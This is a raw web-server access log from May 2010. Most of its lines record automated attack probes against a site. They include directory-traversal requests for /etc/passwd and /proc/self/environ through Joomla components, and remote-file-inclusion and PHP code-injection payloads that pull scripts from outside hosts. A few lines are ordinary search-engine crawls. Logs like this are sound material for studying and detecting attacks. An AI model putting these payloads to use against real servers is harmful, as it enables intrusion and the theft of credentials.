209.126.254.139 - - [28/May/2010:08:05:05 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.195.241 - - [28/May/2010:08:05:59 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.97.225.115 - - [28/May/2010:08:06:35 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
76.12.147.249 - - [28/May/2010:08:07:28 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
209.126.254.139 - - [28/May/2010:08:08:45 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:09:45 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:09:46 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:09:46 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
188.165.68.4 - - [28/May/2010:08:10:06 -0500] "GET /*?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
209.126.254.139 - - [28/May/2010:08:10:30 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.37 - - [28/May/2010:08:13:58 -0500] "GET /logs/?M=A HTTP/1.1" 200 7289 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/May/2010:08:14:03 -0500] "GET /logs/access_log.1155686400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.178 - - [28/May/2010:08:15:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.135.106 - - [28/May/2010:08:15:58 -0500] "GET /logs//////?skin_board_path=http://www.fimaonline.org/id? HTTP/1.1" 200 7298 "-""libwww-perl/5.831"
67.227.135.106 - - [28/May/2010:08:15:58 -0500] "GET //////?skin_board_path=http://www.fimaonline.org/id? HTTP/1.1" 200 1007 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:08:16:04 -0500] "GET /logs/access_log.1265500800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.124.120.23 - - [28/May/2010:08:18:07 -0500] "GET //skin/zero_vote/error.php?dir=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
94.124.120.23 - - [28/May/2010:08:18:07 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.124.120.23 - - [28/May/2010:08:18:07 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:08:20:27 -0500] "GET /logs//index.php?option=com_foobla_suggestions&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [28/May/2010:08:20:27 -0500] "GET //index.php?option=com_foobla_suggestions&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [28/May/2010:08:20:33 -0500] "GET /logs//index.php?option=com_foobla_suggestions&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [28/May/2010:08:20:33 -0500] "GET //index.php?option=com_foobla_suggestions&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.12.147.249 - - [28/May/2010:08:21:07 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.83.209.15 - - [28/May/2010:08:22:44 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:22:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:22:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:22:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.44.120.3 - - [28/May/2010:08:23:26 -0500] "GET /logs/postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:23:26 -0500] "GET /postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
188.165.68.4 - - [28/May/2010:08:23:36 -0500] "GET /logs/access_log.1273363200/*?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
188.165.68.4 - - [28/May/2010:08:23:36 -0500] "GET /*?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
188.165.68.4 - - [28/May/2010:08:23:36 -0500] "GET /logs/*?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
207.46.204.179 - - [28/May/2010:08:23:58 -0500] "GET /logs/access_log.1226016000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.83.209.15 - - [28/May/2010:08:24:12 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:24:28 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
188.165.68.4 - - [28/May/2010:08:24:48 -0500] "GET /logs/access_log.1273017600/*?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.185.231.103 - - [28/May/2010:08:26:40 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [28/May/2010:08:26:40 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.185.231.103 - - [28/May/2010:08:26:40 -0500] "GET /logs/access_log.1271548800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.134 - - [28/May/2010:08:28:58 -0500] "GET /logs/?S=D HTTP/1.1" 200 7289 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.83.209.15 - - [28/May/2010:08:29:24 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:29:24 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:29:24 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:29:32 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:29:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:29:32 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.44.120.3 - - [28/May/2010:08:29:34 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:29:34 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:29:34 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:29:40 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:29:40 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.185.231.103 - - [28/May/2010:08:30:27 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [28/May/2010:08:30:28 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.185.231.103 - - [28/May/2010:08:30:28 -0500] "GET /logs/access_log.1271548800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.83.209.15 - - [28/May/2010:08:30:45 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:30:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:30:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:30:50 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:30:50 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:30:50 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
95.211.18.156 - - [28/May/2010:08:31:29 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [28/May/2010:08:31:41 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [28/May/2010:08:33:31 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
93.90.185.233 - - [28/May/2010:08:34:05 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.146.255.196 - - [28/May/2010:08:34:06 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
93.90.185.233 - - [28/May/2010:08:34:06 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
93.90.185.233 - - [28/May/2010:08:34:06 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
207.46.195.240 - - [28/May/2010:08:34:28 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.3 - - [28/May/2010:08:34:36 -0500] "GET /logs/access_log.1274313600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.204.180 - - [28/May/2010:08:35:28 -0500] "GET /logs/access_log.1242604800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.91.234.162 - - [28/May/2010:08:35:40 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:41 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:43 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:44 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:45 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:46 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:47 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:48 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:49 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:50 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:51 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:52 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:08:35:54 -0500] "GET /logs/access_log.1274227200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:36:12 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:08:36:42 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.46.195.230 - - [28/May/2010:08:37:28 -0500] "GET /logs/access_log.1182470400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.201.229.8 - - [28/May/2010:08:37:45 -0500] "GET /logs/index2php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.201.229.8 - - [28/May/2010:08:37:45 -0500] "GET /index2php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
114.108.177.125 - - [28/May/2010:08:37:52 -0500] "GET /index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:37:52 -0500] "GET /logs/index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:37:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:37:53 -0500] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:37:53 -0500] "GET /logs/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:37:53 -0500] "GET /logs/access_log.1273363200/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.13.89 - - [28/May/2010:08:37:59 -0500] "GET /logs/?D=A HTTP/1.1" 200 7289 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [28/May/2010:08:38:33 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.20.123 - - [28/May/2010:08:38:33 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.20.123 - - [28/May/2010:08:38:34 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [28/May/2010:08:38:34 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
204.93.174.47 - - [28/May/2010:08:38:35 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:38:36 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:38:37 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:01 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:01 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:02 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.46.199.217 - - [28/May/2010:08:39:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.217 - - [28/May/2010:08:39:02 -0500] "GET /artwork/tpig_9men.jpg HTTP/1.1" 200 8552 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
204.93.174.47 - - [28/May/2010:08:39:15 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:15 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:15 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.201.229.8 - - [28/May/2010:08:39:20 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.201.229.8 - - [28/May/2010:08:39:20 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
74.55.43.66 - - [28/May/2010:08:39:33 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [28/May/2010:08:39:33 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [28/May/2010:08:39:33 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
95.211.18.156 - - [28/May/2010:08:39:33 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:39:33 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:08:39:33 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [28/May/2010:08:39:40 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:08:39:40 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:08:39:40 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:46 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:08:39:46 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.100.228.237 - - [28/May/2010:08:39:47 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [28/May/2010:08:39:47 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
204.93.174.47 - - [28/May/2010:08:39:48 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
194.100.228.237 - - [28/May/2010:08:39:49 -0500] "GET /logs/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [28/May/2010:08:39:50 -0500] "GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
114.108.177.125 - - [28/May/2010:08:40:01 -0500] "GET /index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:40:02 -0500] "GET /logs/access_log.1271548800/index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:40:02 -0500] "GET /logs/index.php?option=com_lurm_constructor&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [28/May/2010:08:40:02 -0500] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0"
